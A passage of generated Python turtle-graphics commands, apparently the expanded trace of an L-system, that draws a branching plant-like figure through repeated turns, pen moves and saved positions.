listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,288.17), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,288.17)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,288.17), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,288.17)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,304.17), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,304.17)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((67.35,304.17), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,304.17)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((73.48,318.95), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,318.95)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,273.38), 90.0), ((73.48,318.95), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,318.95)), setheading(67.5) ;
pu(), setposition((73.48,273.38)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,288.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,288.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,288.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,288.17)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,302.95)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,302.95)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((100.50,309.07), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((100.50,309.07)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((100.50,309.07), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((100.50,309.07)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((111.82,320.39), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((111.82,320.39)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((111.82,320.39), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((111.82,320.39)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((117.94,335.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.94,335.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 45.0), ((117.94,335.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.94,335.17)), setheading(67.5) ;
pu(), setposition((85.72,302.95)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((85.72,318.95), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,318.95)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((85.72,318.95), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((85.72,318.95)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((91.84,333.73), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.84,333.73)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((91.84,333.73), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.84,333.73)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((103.16,345.04), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.16,345.04)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((85.72,302.95), 67.5), ((103.16,345.04), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.16,345.04)), setheading(45.0) ;
pu(), setposition((85.72,302.95)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((97.03,314.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((97.03,314.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((97.03,314.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((97.03,314.26)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.35,325.58)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.35,325.58)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((124.35,325.58), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.35,325.58)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((124.35,325.58), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.35,325.58)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((139.13,331.70), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.13,331.70)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((139.13,331.70), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.13,331.70)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((150.44,343.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.44,343.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 22.5), ((150.44,343.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.44,343.01)), setheading(45.0) ;
pu(), setposition((108.35,325.58)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((114.47,340.36), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.47,340.36)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((114.47,340.36), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.47,340.36)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((125.79,351.67), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.79,351.67)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((125.79,351.67), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.79,351.67)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((140.57,357.80), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((140.57,357.80)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((108.35,325.58), 45.0), ((140.57,357.80), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((140.57,357.80)), setheading(22.5) ;
pu(), setposition((108.35,325.58)), setheading(45.0) ;
pu(), setposition((73.48,241.38)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((84.79,252.70), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,252.70)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((84.79,252.70), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.79,252.70)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.10,264.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.10,264.01)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((112.10,264.01), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((112.10,264.01)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((112.10,264.01), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((112.10,264.01)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((126.88,270.14), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((126.88,270.14)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((126.88,270.14), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((126.88,270.14)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((138.20,281.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.20,281.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 22.5), ((138.20,281.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.20,281.45)), setheading(45.0) ;
pu(), setposition((96.10,264.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((102.23,278.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.23,278.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((102.23,278.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.23,278.79)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((113.54,290.11), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.54,290.11)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((113.54,290.11), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.54,290.11)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((128.32,296.23), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.32,296.23)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((96.10,264.01), 45.0), ((128.32,296.23), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.32,296.23)), setheading(22.5) ;
pu(), setposition((96.10,264.01)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((107.42,275.33), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.42,275.33)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((107.42,275.33), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.42,275.33)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.73,286.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.73,286.64)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((149.51,292.76), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((149.51,292.76)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((149.51,292.76), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((149.51,292.76)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((160.83,304.08), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.83,304.08)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((160.83,304.08), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.83,304.08)), setheading(45.0) ;
pu(), setposition((118.73,286.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((136.17,312.74), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.17,312.74)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((136.17,312.74), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.17,312.74)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((150.95,318.86), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.95,318.86)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((150.95,318.86), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.95,318.86)), setheading(22.5) ;
pu(), setposition((118.73,286.64)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((134.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.73,286.64)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.73,286.64)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((162.04,275.33), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.04,275.33)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((162.04,275.33), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.04,275.33)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((176.83,269.20), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.83,269.20)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((176.83,269.20), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
